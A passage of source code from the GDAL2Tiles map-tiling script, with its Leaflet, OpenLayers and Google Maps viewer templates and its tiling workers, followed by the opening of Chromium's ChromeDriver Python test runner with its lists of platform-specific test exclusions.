var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.overflow="hidden";
this.knob_img = document.createElement("div");
this.knob_img.style.height="21px";
this.knob_img.style.width="83px";
this.knob_img.style.filter=loader;
this.knob_img.style.position="relative";
this.knob_img.style.left="-70px";
this.knob.appendChild(this.knob_img);
} else {
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
this.knob.style.backgroundPosition="-70px 0px";
}
container.appendChild(this.knob);
this.slide=new GDraggableObject(this.knob, {container:container});
this.slide.setDraggableCursor('pointer');
this.slide.setDraggingCursor('pointer');
this.container = container;
// attach the control to the map
map.getContainer().appendChild(container);
// init slider
this.setSlider(this.opacity);
// Listen for the slider being moved and set the opacity
GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
//GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });
return container;
}
// Set the default position for the control
CTransparencyControl.prototype.getDefaultPosition = function() {
return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
}
/*
* Full-screen Window Resize
*/
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
// map.checkResize();
}
/*
* Main load function:
*/
function load() {
if (GBrowserIsCompatible()) {
// Bug in the Google Maps: Copyright for Overlay is not correctly displayed
var gcr = GMapType.prototype.getCopyrights;
GMapType.prototype.getCopyrights = function(bounds,zoom) {
return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
}
map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );
map.addMapType(G_PHYSICAL_MAP);
map.setMapType(G_PHYSICAL_MAP);
map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));
hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
GEvent.addListener(map, "maptypechanged", function() {
if (map.getCurrentMapType() == G_HYBRID_MAP) {
map.addOverlay(hybridOverlay);
} else {
map.removeOverlay(hybridOverlay);
}
} );
var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
var mercator = new GMercatorProjection(mapMaxZoom+1);
tilelayer.getTileUrl = function(tile,zoom) {
if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
return "http://www.maptiler.org/img/none.png";
}
var ymax = 1 << zoom;
var y = ymax - tile.y -1;
var tileBounds = new GLatLngBounds(
mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
);
if (mapBounds.intersects(tileBounds)) {
return zoom+"/"+tile.x+"/"+y+".png";
} else {
return "http://www.maptiler.org/img/none.png";
}
}
// IE 7-: support for PNG alpha channel
// Unfortunately, the opacity of the whole overlay is then no longer adjustable
tilelayer.isPng = function() { return true;};
tilelayer.getOpacity = function() { return opacity; }
overlay = new GTileLayerOverlay( tilelayer );
map.addOverlay(overlay);
map.addControl(new GLargeMapControl());
map.addControl(new GHierarchicalMapTypeControl());
map.addControl(new CTransparencyControl( overlay ));
""" % args # noqa
if self.kml:
s += """
map.addMapType(G_SATELLITE_3D_MAP);
map.getEarthInstance(getEarthInstanceCB);
"""
s += """
map.enableContinuousZoom();
map.enableScrollWheelZoom();
map.setMapType(G_HYBRID_MAP);
}
resize();
}
"""
if self.kml:
s += """
function getEarthInstanceCB(object) {
var ge = object;
if (ge) {
var url = document.location.toString();
url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
var link = ge.createLink("");
if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
else { link.setHref(url) };
var networkLink = ge.createNetworkLink("");
networkLink.setName("TMS Map Overlay");
networkLink.setFlyToView(true);
networkLink.setLink(link);
ge.getFeatures().appendChild(networkLink);
} else {
// alert("You should open a KML in Google Earth");
// add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
}
}
""" % args # noqa
s += """
onresize=function(){ resize(); };
//]]>
</script>
</head>
<body onload="load()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LEAVE THIS NOTE ABOUT THE AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THIS HTML COMMENT. THANK YOU -->
</div>
<div id="map"></div>
</body>
</html>
""" % args # noqa
return s
def generate_leaflet(self):
"""
Template for leaflet.html implementing overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title.replace('"', '\\"')
args['htmltitle'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['centerlat'] = (args['north'] + args['south']) / 2.
args['centerlon'] = (args['west'] + args['east']) / 2.
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['beginzoom'] = self.tmaxz
args['tilesize'] = self.tilesize # not used
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url # not used
args['copyright'] = self.options.copyright.replace('"', '\\"')
s = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' />
<title>%(htmltitle)s</title>
<!-- Leaflet -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/leaflet/1.3.4/leaflet.css" />
<script src="https://cdnjs.cloudflare.com/ajax/libs/leaflet/1.3.4/leaflet.js"></script>
<!-- Ajax -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.10.4/jquery-ui.min.js"></script>
<style>
body { margin:0; padding:0; }
body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; }
#map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */
.ctl {
padding: 2px 10px 2px 10px;
background: white;
background: rgba(255,255,255,0.9);
box-shadow: 0 0 15px rgba(0,0,0,0.2);
border-radius: 5px;
text-align: right;
}
.title {
font-size: 18pt;
font-weight: bold;
}
.src {
font-size: 10pt;
}
</style>
</head>
<body>
<div id="map"></div>
<script>
/* **** Leaflet **** */
var map = L.map('map').setView([%(centerlat)s, %(centerlon)s], %(beginzoom)s);
// Base layers
// .. OpenStreetMap
var osm = L.tileLayer('https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png', {maxZoom: 20, attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors'});
// .. Thaichote by GISTDA
var theos = L.tileLayer('http://go-tiles1.gistda.or.th/mapproxy/wmts/thaichote/GLOBAL_WEBMERCATOR/{z}/{x}/{y}.png', {maxZoom: 20, attribution: '© <a href = "http://www.gistda.or.th">GISTDA</a>'});
// .. Google Hybrid
var ghyb = L.tileLayer('https://mt1.google.com/vt/lyrs=y&x={x}&y={y}&z={z}', {maxZoom: 20, attribution: '© <a href = "#">Google</a>'});
// .. OSM Toner
//var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {maxZoom: 20, attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.'});
// .. White background
var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==");
// Overlay layers (TMS) and XYZ
// Use TMS with tms: true OR use XYZ with tms: false
var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {maxZoom: 22, tms: false, opacity: 0.9, attribution: "%(copyright)s"}).addTo(map);
// Map
/*
var map = L.map('map', {
center: [%(centerlat)s, %(centerlon)s],
zoom: %(beginzoom)s,
minZoom: %(minzoom)s,
maxZoom: %(maxzoom)s,
layers: [osm]
});
*/
var basemaps = {"OpenStreetMap": osm, "Thaichote by GISTDA": theos, "Google Hybrid": ghyb, "Without background": white}
var overlaymaps = {"Layer": lyr}
// Title
var title = L.control();
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl title');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = "%(title)s";
};
title.addTo(map);
// Note
var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2018 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a> & <a href="http://www.cgistln.nu.ac.th/">GISTNU</a>';
var title = L.control({position: 'bottomleft'});
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl src');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = src;
};
title.addTo(map);
// Add base layers
L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map);
// Fit to overlay bounds (SW and NE points with (lat, lon))
//map.fitBounds([[%(south)s, %(west)s], [%(north)s, %(east)s]]);
</script>
</body>
</html>
""" % args # noqa
return s
def generate_openlayers(self):
"""
Template for openlayers.html implementing overlay of available Spherical Mercator layers.
It returns filled string. Expected variables:
title, bingkey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title
args['bingkey'] = self.options.bingkey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tilesize'] = self.tilesize
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
if self.options.tmscompatible:
args['tmsoffset'] = "-1"
else:
args['tmsoffset'] = ""
if self.options.profile == 'raster':
args['rasterzoomlevels'] = self.tmaxz+1
args['rastermaxresolution'] = 2**(self.nativezoom) * self.out_gt[1]
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
.olImageLoadError { display: none; }
.olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; }
</style>""" % args # noqa
if self.options.profile == 'mercator':
s += """
<script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script>
""" % args
s += """
<script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script>
<script>
var map;
var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s);
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var emptyTileURL = "http://www.maptiler.org/img/none.png";
OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3;
function init(){""" % args
if self.options.profile == 'mercator':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:3857",
displayProjection: new OpenLayers.Projection("EPSG:4326"),
numZoomLevels: 20
};
map = new OpenLayers.Map(options);
// Create Google Mercator layers
var gmap = new OpenLayers.Layer.Google("Google Streets",
{
type: google.maps.MapTypeId.ROADMAP,
sphericalMercator: true
});
var gsat = new OpenLayers.Layer.Google("Google Satellite",
{
type: google.maps.MapTypeId.SATELLITE,
sphericalMercator: true
});
var ghyb = new OpenLayers.Layer.Google("Google Hybrid",
{
type: google.maps.MapTypeId.HYBRID,
sphericalMercator: true
});
var gter = new OpenLayers.Layer.Google("Google Terrain",
{
type: google.maps.MapTypeId.TERRAIN,
sphericalMercator: true
});
// Create Bing layers
var broad = new OpenLayers.Layer.Bing({
name: "Bing Roads",
key: "%(bingkey)s",
type: "Road",
sphericalMercator: true
});
var baer = new OpenLayers.Layer.Bing({
name: "Bing Aerial",
key: "%(bingkey)s",
type: "Aerial",
sphericalMercator: true
});
var bhyb = new OpenLayers.Layer.Bing({
name: "Bing Hybrid",
key: "%(bingkey)s",
type: "AerialWithLabels",
sphericalMercator: true
});
// Create OSM layer
var osm = new OpenLayers.Layer.OSM("OpenStreetMap");
""" % args # noqa
if self.options.xyz:
s += """
// create TMS Overlay layer
var tmsoverlay = new OpenLayers.Layer.XYZ("XYZ Overlay",
"${z}/${x}/${y}.png", {
transitionEffect: 'resize',
isBaseLayer: false
});
""" % args # noqa
else:
s += """
// create TMS Overlay layer
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
""" % args # noqa
s += """
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([gmap, gsat, ghyb, gter,
broad, baer, bhyb,
osm, tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds.transform(map.displayProjection, map.projection));
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:4326"
};
map = new OpenLayers.Map(options);
var wms = new OpenLayers.Layer.WMS("VMap0",
"http://tilecache.osgeo.org/wms-c/Basic.py?",
{
layers: 'basic',
format: 'image/png'
}
);
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([wms,tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds);
""" % args # noqa
elif self.options.profile == 'raster':
s += """
var options = {
div: "map",
controls: [],
maxExtent: new OpenLayers.Bounds(%(west)s, %(south)s, %(east)s, %(north)s),
maxResolution: %(rastermaxresolution)f,
numZoomLevels: %(rasterzoomlevels)d
};
map = new OpenLayers.Map(options);
var layer = new OpenLayers.Layer.TMS("TMS Layer", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
getURL: getURL
});
map.addLayer(layer);
map.zoomToExtent(mapBounds);
""" % args # noqa
s += """
map.addControls([new OpenLayers.Control.PanZoomBar(),
new OpenLayers.Control.Navigation(),
new OpenLayers.Control.MousePosition(),
new OpenLayers.Control.ArgParser(),
new OpenLayers.Control.Attribution()]);
}
""" % args
if self.options.profile == 'mercator' and self.options.xyz is None:
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom();
if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') {
z+=1;
}
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom()%(tmsoffset)s;
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'raster':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom();
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
s += """
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
if (map.updateSize) { map.updateSize(); };
}
onresize=function(){ resize(); };
</script>
</head>
<body onload="init()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LEAVE THIS NOTE ABOUT THE AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THIS HTML COMMENT. THANK YOU -->
</div>
<div id="map"></div>
<script type="text/javascript" >resize()</script>
</body>
</html>""" % args # noqa
return s
@staticmethod
def getYtile(ty, tz, options):
"""
Calculates the y-tile number based on whether XYZ or TMS (default) system is used
:param ty: The y-tile number (TMS convention)
:param tz: The zoom level
:param options: parsed gdal2tiles options (only options.xyz is used here)
:return: The transformed tile number
"""
if options.xyz:
return (2**tz - 1) - ty # Convert from TMS to XYZ numbering system
else:
return ty
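# Illustrative example: at tz=3 there are 2**3 = 8 tile rows. TMS counts rows
# from the bottom (south) while XYZ/Google counts from the top (north), so
# with --xyz a TMS row ty=5 becomes (2**3 - 1) - 5 = 2.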
def worker_tile_details(input_file, output_folder, options, send_pipe=None):
try:
gdal2tiles = GDAL2Tiles(input_file, output_folder, options)
gdal2tiles.open_input()
gdal2tiles.generate_metadata()
tile_job_info, tile_details = gdal2tiles.generate_base_tiles()
return_data = (tile_job_info, tile_details)
if send_pipe:
send_pipe.send(return_data)
return return_data
except Exception as e:
print("worker_tile_details failed ", str(e))
def progress_printer_thread(queue, nb_jobs):
pb = ProgressBar(nb_jobs)
pb.start()
for _ in range(nb_jobs):
queue.get()
pb.log_progress()
queue.task_done()
class ProgressBar(object):
def __init__(self, total_items):
self.total_items = total_items
self.nb_items_done = 0
self.current_progress = 0
self.STEP = 2.5
def start(self):
sys.stdout.write("0")
def log_progress(self, nb_items=1):
self.nb_items_done += nb_items
progress = float(self.nb_items_done) / self.total_items * 100
if progress >= self.current_progress + self.STEP:
done = False
while not done:
if self.current_progress + self.STEP <= progress:
self.current_progress += self.STEP
if self.current_progress % 10 == 0:
sys.stdout.write(str(int(self.current_progress)))
if self.current_progress == 100:
sys.stdout.write("\n")
else:
sys.stdout.write(".")
else:
done = True
sys.stdout.flush()
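# Illustrative output: start() prints "0" and each log_progress() call advances
# the bar in 2.5% steps, writing "." for intermediate steps and the value at
# every multiple of 10. For 8 tiles the full trace is
# "0...10...20...30...40...50...60...70...80...90...100" followed by a newline.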
def get_tile_swne(tile_job_info, options):
if options.profile == 'mercator':
mercator = GlobalMercator()
tile_swne = mercator.TileLatLonBounds
elif options.profile == 'geodetic':
geodetic = GlobalGeodetic(options.tmscompatible)
tile_swne = geodetic.TileLatLonBounds
elif options.profile == 'raster':
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if tile_job_info.kml and tile_job_info.in_srs_wkt:
in_srs = osr.SpatialReference()
in_srs.ImportFromWkt(tile_job_info.in_srs_wkt)
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1])
west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tilesize * pixelsizex
east = west + tile_job_info.tilesize * pixelsizex
south = tile_job_info.ominy + y * tile_job_info.tilesize * pixelsizex
north = south + tile_job_info.tilesize * pixelsizex
if not tile_job_info.is_epsg_4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
tile_swne = rastertileswne
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
return tile_swne
def single_threaded_tiling(input_file, output_folder, options):
"""
Keep a single-threaded version that avoids multiprocessing, for platforms that do not
support it
"""
if options.verbose:
print("Begin tiles details calc")
conf, tile_details = worker_tile_details(input_file, output_folder, options)
if options.verbose:
print("Tiles details calc complete.")
if not options.verbose and not options.quiet:
progress_bar = ProgressBar(len(tile_details))
progress_bar.start()
for tile_detail in tile_details:
create_base_tile(conf, tile_detail, options)
if not options.verbose and not options.quiet:
progress_bar.log_progress()
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def multi_threaded_tiling(input_file, output_folder, options):
nb_processes = options.nb_processes or 1
(conf_receiver, conf_sender) = Pipe(False)
if options.verbose:
print("Begin tiles details calc")
p = Process(target=worker_tile_details,
args=[input_file, output_folder, options],
kwargs={"send_pipe": conf_sender})
p.start()
# Make sure to consume the pipe before joining. If the payload is too big, it won't be sent
# in one go, and the sending process would never finish, waiting for the receiver to drain
# the pipe before it can send the rest of the data
conf, tile_details = conf_receiver.recv()
p.join()
if options.verbose:
print("Tiles details calc complete.")
# Have to create the Queue through a multiprocessing.Manager to get a Queue Proxy,
# otherwise you can't pass it as a param in the method invoked by the pool...
manager = Manager()
queue = manager.Queue()
pool = Pool(processes=nb_processes)
# TODO: gbataille - check the confs for which each element is an array... one useless level?
# TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..."
# TODO: gbataille - check memory footprint and time on big image. are they opened x times
for tile_detail in tile_details:
pool.apply_async(create_base_tile, (conf, tile_detail, options), {"queue": queue})
if not options.verbose and not options.quiet:
p = Process(target=progress_printer_thread, args=[queue, len(tile_details)])
p.start()
pool.close()
pool.join() # Jobs finished
if not options.verbose and not options.quiet:
p.join() # Traces done
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def main():
# TODO: gbataille - use mkdtemp to work in a temp directory
# TODO: gbataille - debug intermediate tiles.vrt not produced anymore?
# TODO: gbataille - Refactor generate overview tiles to not depend on self variables
argv = gdal.GeneralCmdLineProcessor(sys.argv)
input_file, output_folder, options = process_args(argv[1:])
nb_processes = options.nb_processes or 1
if nb_processes == 1:
single_threaded_tiling(input_file, output_folder, options)
else:
multi_threaded_tiling(input_file, output_folder, options)
if __name__ == '__main__':
# start_time = time.time()
main()
# print("--- %s seconds ---" % (time.time() - start_time))
|
run_py_tests.py
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""End to end tests for ChromeDriver."""
import base64
import json
import math
import optparse
import os
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import urllib2
import shutil
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir, 'client'))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir, 'server'))
import chrome_paths
import chromedriver
import unittest_util
import util
import server
from webelement import WebElement
import webserver
_TEST_DATA_DIR = os.path.join(chrome_paths.GetTestData(), 'chromedriver')
if util.IsLinux():
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android'))
from pylib import android_commands
from pylib import constants
from pylib import forwarder
from pylib import valgrind_tools
from pylib.device import device_utils
_NEGATIVE_FILTER = [
# https://code.google.com/p/chromedriver/issues/detail?id=213
'ChromeDriverTest.testClickElementInSubFrame',
# This test is flaky since it uses setTimeout.
# Re-enable once crbug.com/177511 is fixed and we can remove setTimeout.
'ChromeDriverTest.testAlert',
]
_VERSION_SPECIFIC_FILTER = {}
_VERSION_SPECIFIC_FILTER['HEAD'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=992
'ChromeDownloadDirTest.testDownloadDirectoryOverridesExistingPreferences',
]
_VERSION_SPECIFIC_FILTER['37'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=954
'MobileEmulationCapabilityTest.testClickElement',
'MobileEmulationCapabilityTest.testHoverOverElement',
'MobileEmulationCapabilityTest.testSingleTapElement',
]
_VERSION_SPECIFIC_FILTER['36'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=954
'MobileEmulationCapabilityTest.testClickElement',
'MobileEmulationCapabilityTest.testHoverOverElement',
'MobileEmulationCapabilityTest.testSingleTapElement',
]
_OS_SPECIFIC_FILTER = {}
_OS_SPECIFIC_FILTER['win'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=214
'ChromeDriverTest.testCloseWindow',
# https://code.google.com/p/chromedriver/issues/detail?id=299
'ChromeLogPathCapabilityTest.testChromeLogPath',
]
_OS_SPECIFIC_FILTER['linux'] = [
# Xvfb doesn't support maximization.
'ChromeDriverTest.testWindowMaximize',
# https://code.google.com/p/chromedriver/issues/detail?id=302
'ChromeDriverTest.testWindowPosition',
'ChromeDriverTest.testWindowSize',
]
_OS_SPECIFIC_FILTER['mac'] = [
]
_DESKTOP_NEGATIVE_FILTER = [
# Desktop doesn't support touch (without --touch-events).
'ChromeDriverTest.testSingleTapElement',
'ChromeDriverTest.testTouchDownUpElement',
'ChromeDriverTest.testTouchFlickElement',
'ChromeDriverTest.testTouchMovedElement',
'ChromeDriverAndroidTest.*',
]
def _GetDesktopNegativeFilter(version_name):
filter = _NEGATIVE_FILTER + _DESKTOP_NEGATIVE_FILTER
os = util.GetPlatformName()
if os in _OS_SPECIFIC_FILTER:
filter += _OS_SPECIFIC_FILTER[os]
if version_name in _VERSION_SPECIFIC_FILTER:
filter += _VERSION_SPECIFIC_FILTER[version_name]
return filter
_ANDROID_NEGATIVE_FILTER = {}
_ANDROID_NEGATIVE_FILTER['chrome'] = (
_NEGATIVE_FILTER + [
# TODO(chrisgao): fix hang of tab crash test on android.
'ChromeDriverTest.testTabCrash',
# Android doesn't support switches and extensions.
'ChromeSwitchesCapabilityTest.*',
'ChromeExtensionsCapabilityTest.*',
'MobileEmulationCapabilityTest.*',
'ChromeDownloadDirTest.*',
# https://crbug.com/274650
'ChromeDriverTest.testCloseWindow',
# https://code.google.com/p/chromedriver/issues/detail?id=270
'ChromeDriverTest.testPopups',
# https://code.google.com/p/chromedriver/issues/detail?id=298
'ChromeDriverTest.testWindowPosition',
'ChromeDriverTest.testWindowSize',
'ChromeDriverTest.testWindowMaximize',
'ChromeLogPathCapabilityTest.testChromeLogPath',
'RemoteBrowserTest.*',
# Don't enable perf testing on Android yet.
'PerfTest.testSessionStartTime',
'PerfTest.testSessionStopTime',
'PerfTest.testColdExecuteScript',
# https://code.google.com/p/chromedriver/issues/detail?id=459
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
# Android doesn't support multiple sessions on one device.
'SessionHandlingTest.testGetSessions',
]
)
_ANDROID_NEGATIVE_FILTER['chrome_stable'] = (
